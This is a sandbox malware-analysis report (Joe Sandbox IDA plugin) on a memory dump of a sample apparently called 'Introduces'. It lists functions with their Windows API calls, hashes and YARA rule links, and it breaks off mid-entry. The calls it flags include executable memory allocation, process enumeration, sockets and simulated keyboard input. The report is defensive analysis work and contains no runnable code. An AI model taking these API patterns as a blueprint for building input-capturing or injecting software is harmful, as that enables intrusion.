Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c75eb4e8425621deb664da7e013a9090f5666728bc80f289582682d5773f082e
Instruction ID: 8306f7c56809b78e4aae37fcdd0fdf524a1602af74821dd8c109920ae9375861
Opcode Fuzzy Hash: c75eb4e8425621deb664da7e013a9090f5666728bc80f289582682d5773f082e
Instruction Fuzzy Hash: CAC17179A10216EFCB14CF98C884DAEB7F5FF88714B218598E805DB251DB31ED85CB90

Function 00A6E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00A6E7A7
CharLowerBuffW.USER32(?,?), ref: 00A6E7EA

Part of subcall function 00A6DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A6DEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00A6E9EA
_memmove.LIBCMT ref: 00A6E9FD

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 71951b2884e53f3077952d787931de6c25ec824af831c1d806f83f2014c73542
Instruction ID: eaab9b31e0e6b4fbbdf13f738582198cf10713a9f24fcf55bc5eb6065f4d277c
Opcode Fuzzy Hash: 71951b2884e53f3077952d787931de6c25ec824af831c1d806f83f2014c73542
Instruction Fuzzy Hash: 2CC15675A083019FC714DF28C480A6ABBF4FF89714F14896EF8999B391D771E946CB82

Function 00A6877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A687AD
CoUninitialize.OLE32 ref: 00A687B8

Part of subcall function 00A7DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00A68A0E,?,00000000), ref: 00A7DF71

VariantInit.OLEAUT32(?), ref: 00A687C3
VariantClear.OLEAUT32(?), ref: 00A68A94

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 4630f6cf3a06ab2503a52993abd0026f69fb5b3dffcc9104096719a1b8d0b6d7
Instruction ID: de99b1b2028245d765984f0323c5c854d456658e798965d7b1525f1fb2705e39
Opcode Fuzzy Hash: 4630f6cf3a06ab2503a52993abd0026f69fb5b3dffcc9104096719a1b8d0b6d7
Instruction Fuzzy Hash: C0A13575204B059FC710DF64C481B2AB7F8BF88354F158949FA9A9B3A2CB34ED45CB92

Function 00A4814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A83C4C,?), ref: 00A48308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A83C4C,?), ref: 00A48320
CLSIDFromProgID.OLE32(?,?,00000000,00A80988,000000FF,?,00000000,00000800,00000000,?,00A83C4C,?), ref: 00A48345
_memcmp.LIBCMT ref: 00A48366

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: baf0b544aa8c9e3c1256670929f58f95a52166712abdd52c587bfde4993a2c89
Instruction ID: 44fb9ea15dc5c2b4c0aec2d1e7f7f714cf672dc260da74f78c54910814523ddc
Opcode Fuzzy Hash: baf0b544aa8c9e3c1256670929f58f95a52166712abdd52c587bfde4993a2c89
Instruction Fuzzy Hash: F4814A75A00109EFCB00DFD8D988EEEB7B9FF89315F204558E516AB250DB75AE06CB60

Function 00A4749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A474AC
SysAllocString.OLEAUT32(00000000), ref: 00A47555
VariantCopy.OLEAUT32 ref: 00A47584
VariantClear.OLEAUT32(?), ref: 00A475AB

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 99555822abe46c82ed8b999d76bb119cc9c950254f5b79253b3c104b39da39de
Instruction ID: 929d33abe4e7937c39b25414d4d8470a3a1fb66635a6dc73cee991170282409a
Opcode Fuzzy Hash: 99555822abe46c82ed8b999d76bb119cc9c950254f5b79253b3c104b39da39de
Instruction Fuzzy Hash: 3251C938608745DFDB209F79D895A3DF3E6AF85310F30881FE546DB2A2DB7098808715

Function 00A6F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A6F526
Process32FirstW.KERNEL32(00000000,?), ref: 00A6F534

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Process32NextW.KERNEL32(00000000,?), ref: 00A6F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00A6F603

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: c5f4a3e1b1a2538ed11946686af9eead9081e918b63aa750c15ed004be4c6c6d
Instruction ID: 839dc776559cff47ea9990dedcbb66f5106ac0a9d46d1e283f2324e389ffb62f
Opcode Fuzzy Hash: c5f4a3e1b1a2538ed11946686af9eead9081e918b63aa750c15ed004be4c6c6d
Instruction Fuzzy Hash: 59515D71504315AFD310EF64EC86EABB7E8EF94750F00492DF596972A1EB70E908CB92

Function 00A1492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A149C0
__flush.LIBCMT ref: 00A149E0
__write.LIBCMT ref: 00A14A13
__flsbuf.LIBCMT ref: 00A14A41

Part of subcall function 00A18D58: __getptd_noexit.LIBCMT ref: 00A18D58

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction ID: 45dcf5c8dffb90a8ce0f600a49d1e2999705757037ece6ebb8335f06e4ce7035
Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
Instruction Fuzzy Hash: D541B53560070A9BDF28CF6DC9809EF7BB6AF493A0B24813DE8598B640D7719DC18B44

Function 00A4A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00A4A68A
__itow.LIBCMT ref: 00A4A6BB

Part of subcall function 00A4A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00A4A976

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00A4A724
__itow.LIBCMT ref: 00A4A77B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: c9f6ff1b633bdd1dcb350dbc9da14bf425eaf5374063a67e6c4142be5845475c
Instruction ID: d9b132def512ac3ce76f4b2ea04fa761ab99df30812426696acfd0986741427d
Opcode Fuzzy Hash: c9f6ff1b633bdd1dcb350dbc9da14bf425eaf5374063a67e6c4142be5845475c
Instruction Fuzzy Hash: 57419274A4020DAFDF21EF54D956BEE7BB9EF98750F040029F905A72C1DB709944CBA2

Function 00A67095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00A670BC
WSAGetLastError.WSOCK32(00000000), ref: 00A670CC

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A67130
WSAGetLastError.WSOCK32(00000000), ref: 00A6713C

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 0bc258de26674d5e7f01193af3b686dab0a7f8813a08ecd0dce5f31e65d41521
Instruction ID: 81f08afa122070593a4612da9776f25c7c5ec61cc1a1096a27db2b0ab63ed4bc
Opcode Fuzzy Hash: 0bc258de26674d5e7f01193af3b686dab0a7f8813a08ecd0dce5f31e65d41521
Instruction Fuzzy Hash: 66419F757402046FEB20AF64DC86F7E77E89B84B14F048558FB599B3D2DB709D018B91

Function 00A66B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A80980), ref: 00A66B92
_strlen.LIBCMT ref: 00A66BC4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 35e4e6cb2691fa7a9197a399405511f0c051f8c2247f0e65811bfc2103d74362
Instruction ID: 18f6e134232af2d66df27768d38c8ecee2c0b9277ef5b2d41d0fbcb5cd86d564
Opcode Fuzzy Hash: 35e4e6cb2691fa7a9197a399405511f0c051f8c2247f0e65811bfc2103d74362
Instruction Fuzzy Hash: 75419175A00508ABCB14EBA4DDD5EBEB3B9EF58310F148155F91AAB2D2DF30AD41CB90

Function 00A78E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A78F03

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ed670b1416e47702ca3a1c76ddf5f96a814b2a100fd0d0378c5006c54fc65a7a
Instruction ID: d0cf59711a1f2ba0af54d1d259b1149d4bd02bbe2b1fcb5bf80be9a41b1bf5dd
Opcode Fuzzy Hash: ed670b1416e47702ca3a1c76ddf5f96a814b2a100fd0d0378c5006c54fc65a7a
Instruction Fuzzy Hash: C131E430681108AFEF249B58CC4DFAD37A6EB46320F24C511FA19D62E1DFB9E950CB52

Function 00A7B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00A7B1D2
GetWindowRect.USER32(?,?), ref: 00A7B248
PtInRect.USER32(?,?,00A7C6BC), ref: 00A7B258
MessageBeep.USER32(00000000), ref: 00A7B2C9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f2e89a50e3fd4dc4c6724479f1692e95a997de84499e5e7ac75b45835da56145
Instruction ID: 2a6f5df77ec305c1ea3df51cd9c7324193637f256a2129317524eb5905e9eb7a
Opcode Fuzzy Hash: f2e89a50e3fd4dc4c6724479f1692e95a997de84499e5e7ac75b45835da56145
Instruction Fuzzy Hash: 2B415DB1A151159FDB11CF98CC84BAD7BF5FF89311F14C1A9E81C9B262D730A942CBA0

Function 00A512D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00A51326
SetKeyboardState.USER32(00000080,?,00000001), ref: 00A51342
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00A513A8
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00A513FA

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 1322c132576be8ba44b509cf496234fce1bb956e8634baee232d1902ebd9fad1
Instruction ID: b71a12277cafb7c35ff223265a97d71b47e43e9256ab3aaa0682dbb72eb09e97
Opcode Fuzzy Hash: 1322c132576be8ba44b509cf496234fce1bb956e8634baee232d1902ebd9fad1
Instruction Fuzzy Hash: C2314870A40608AEFF74CB65CC15BFD7BB9BB44332F04825AEC905A6D1E374894E9B61

Function 00A51410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00A51465
SetKeyboardState.USER32(00000080,?,00008000), ref: 00A51481
PostMessageW.USER32(00000000,00000101,00000000), ref: 00A514E0
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00A51532

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 18a0e7b94c0923aa322ac6f7df77f526500a8cbc6e6ac6c421fa17443a3312e4
Instruction ID: 7037a634a4c3aac7e55eaa3e57958127f2af4f5fcce3e8a3bbf5d3a6cde3f380
Opcode Fuzzy Hash: 18a0e7b94c0923aa322ac6f7df77f526500a8cbc6e6ac6c421fa17443a3312e4
Instruction Fuzzy Hash: 7B3169B09406086EFF34CB659C04FFABBB5BB89312F08831AEC81521D1D3788D4D8B62

Function 00A263F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A2642B
__isleadbyte_l.LIBCMT ref: 00A26459
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A26487
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A264BD

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 1a4b70ffd6b398c4840641fbd0a9b5bfdb5146c38e844db4a64722fe70672697
Instruction ID: 7ea9fa108f07c88c3b0040b6853a59352289bb0d8a3360cfe2ace0bb94cbe885
Opcode Fuzzy Hash: 1a4b70ffd6b398c4840641fbd0a9b5bfdb5146c38e844db4a64722fe70672697
Instruction Fuzzy Hash: E731D231602266AFDB21AF69EE44BAA7BB5FF40320F154178E8A487190DB31E990D750

Function 00A7552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00A7553F

Part of subcall function 00A53B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A53B4E
Part of subcall function 00A53B34: GetCurrentThreadId.KERNEL32 ref: 00A53B55
Part of subcall function 00A53B34: AttachThreadInput.USER32(00000000,?,00A555C0), ref: 00A53B5C

GetCaretPos.USER32(?), ref: 00A75550
ClientToScreen.USER32(00000000,?), ref: 00A7558B
GetForegroundWindow.USER32 ref: 00A75591

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: ad442a4abe39d415a08168c985becb7797ef330b477d5f13301826bb89aadd1c
Instruction ID: 226fc6dda28d558cfa8efa37f63340db3ec269c03d4a05c914d4ba82bd6d5a40
Opcode Fuzzy Hash: ad442a4abe39d415a08168c985becb7797ef330b477d5f13301826bb89aadd1c
Instruction Fuzzy Hash: 13311C72D00108AFDB00EFA5DD85AEFB7F9EF98304F10406AE515E7241DA71AA058BA0

Function 00A7CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F29E2: GetWindowLongW.USER32(?,000000EB), ref: 009F29F3

GetCursorPos.USER32(?), ref: 00A7CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A2BCEC,?,?,?,?,?), ref: 00A7CB8F
GetCursorPos.USER32(?), ref: 00A7CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A2BCEC,?,?,?), ref: 00A7CC16

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 92673c1ebb68cf33f1f688c4728394a8c22a828e43ec0002459150c61d09f793
Instruction ID: 968ea4e0853d93e8758c51256548cd49e329a20c8624da99bc4f6af14978de4a
Opcode Fuzzy Hash: 92673c1ebb68cf33f1f688c4728394a8c22a828e43ec0002459150c61d09f793
Instruction Fuzzy Hash: 46318F35600018AFCB15CF94CC59EBA7BB5EB89320F04C099F9499B261C7319D51EFA0

Function 00A10BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00A10BE2

Part of subcall function 00A0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A57E51,?,?,00000000), ref: 00A04041
Part of subcall function 00A0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A57E51,?,?,00000000,?,?), ref: 00A04065

_fprintf.LIBCMT ref: 00A10C19
OutputDebugStringW.KERNEL32(?), ref: 00A4694C

Part of subcall function 00A14CCA: _flsall.LIBCMT ref: 00A14CE3

__setmode.LIBCMT ref: 00A10C4E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
